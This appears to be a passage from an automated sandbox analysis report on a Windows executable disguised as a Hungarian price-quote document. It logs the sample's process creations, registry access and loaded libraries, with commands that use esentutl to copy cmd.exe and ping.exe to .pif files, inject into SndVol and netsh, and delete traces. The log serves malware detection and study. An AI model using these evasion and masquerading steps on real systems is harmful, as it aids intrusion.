          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeReversingLabs: Detection: 47%
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeFile read: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe "C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe"
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rqbnwzgR.cmd" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\SndVol.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rqbnwzgR.cmd" "Jump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\SndVol.exe"Jump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: url.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: apllllphllelp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: winhttpcom.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??????????.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??????????.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??????????.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ????.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ???e???????????.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ???e???????????.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??????????.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ???.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ???.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ???.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ????.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: tquery.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: spp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: spp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: endpointdlp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: advapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: spp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: sppwmi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: sppcext.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: winscard.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: atlthunk.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: mmdevapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: winmmbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: ksuser.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: avrt.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: audioses.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: msacm32.dllJump to behavior
          Source: C:\Windows\SysWOW64\SndVol.exeSection loaded: midimap.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeStatic file information: File size 1056768 > 1048576
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: SndVol.pdbGCTL source: explorer.exe, 00000006.00000002.4182572675.0000000010F3F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4169965326.0000000001106000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4171199207.0000000003D8F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: netsh.pdb source: SndVol.exe, 00000005.00000003.1857901713.000000000279F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1857901713.000000000278F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1887842160.0000000036530000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, netsh.exe, 00000007.00000002.4170356503.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699414288.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.0000000020680000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000003.00000003.1766177513.0000000005350000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.3.dr
          Source: Binary string: wntdll.pdbUGP source: SndVol.exe, 00000005.00000003.1782780302.00000000363B2000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1780846168.0000000036205000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1861588490.000000000368D000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1857987184.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.00000000039DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.0000000003840000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: SndVol.exe, 00000005.00000003.1857901713.000000000279F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1857901713.000000000278F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1887842160.0000000036530000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4170356503.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000004.00000003.1771269701.0000000005700000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.4.dr
          Source: Binary string: wntdll.pdb source: SndVol.exe, SndVol.exe, 00000005.00000003.1782780302.00000000363B2000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1780846168.0000000036205000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000007.00000003.1861588490.000000000368D000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1857987184.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.00000000039DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.0000000003840000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbH source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbGCTL source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1769510665.0000000021611000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1769510665.00000000215E2000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782270171.0000000002765000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699414288.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.0000000020680000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, 